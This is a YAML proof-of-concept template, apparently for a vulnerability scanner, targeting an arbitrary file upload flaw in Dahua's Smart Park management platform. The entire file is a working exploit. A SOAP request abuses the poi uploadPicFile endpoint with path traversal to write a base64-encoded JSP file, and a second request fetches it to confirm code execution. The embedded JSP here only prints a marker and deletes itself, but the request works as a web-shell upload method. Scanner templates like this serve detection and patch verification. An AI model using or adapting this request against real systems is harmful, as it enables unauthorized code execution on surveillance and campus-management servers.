dddd/common/config/pocs/dahua-smart-park-poi-upload.yaml

id: dahua-smart-park-poi-upload

info:
  name: 大华智慧园区综合管理平台 poi 任意文件上传
  author: SleepingBag945
  severity: critical
  description: 大华智慧园区综合管理平台是大华技术提供的一种智能化解决方案，旨在提供全面的园区管理和安全监控功能。大华智慧园区综合管理平台/emap/webservice/gis/soap/poi存在任意文件上传漏洞。
  tags: dahua

http:
  - raw:
      - |
        POST /emap/webservice/gis/soap/poi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml;charset=UTF-8

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:res="http://response.webservice.poi.mapbiz.emap.dahuatech.com/">
        <soapenv:Header/>
        <soapenv:Body>
        <res:uploadPicFile>
        <!--type: string-->
        <arg0>/../../{{randstr_1}}.jsp</arg0>
        <!--type: base64Binary-->
        <arg1>PCUgb3V0LnByaW50bG4oImEyZEAyOHZjISIpO25ldyBqYXZhLmlvLkZpbGUoYXBwbGljYXRpb24uZ2V0UmVhbFBhdGgocmVxdWVzdC5nZXRTZXJ2bGV0UGF0aCgpKSkuZGVsZXRlKCk7JT4=</arg1>
        </res:uploadPicFile>
        </soapenv:Body>
        </soapenv:Envelope>

        
      - |
        GET /upload/{{randstr_1}}.jsp HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code_1 == 200 && contains(body_1,"xmlns:")
          - status_code_2 == 200 && contains(body_2,"a2d@28vc!")
        condition: and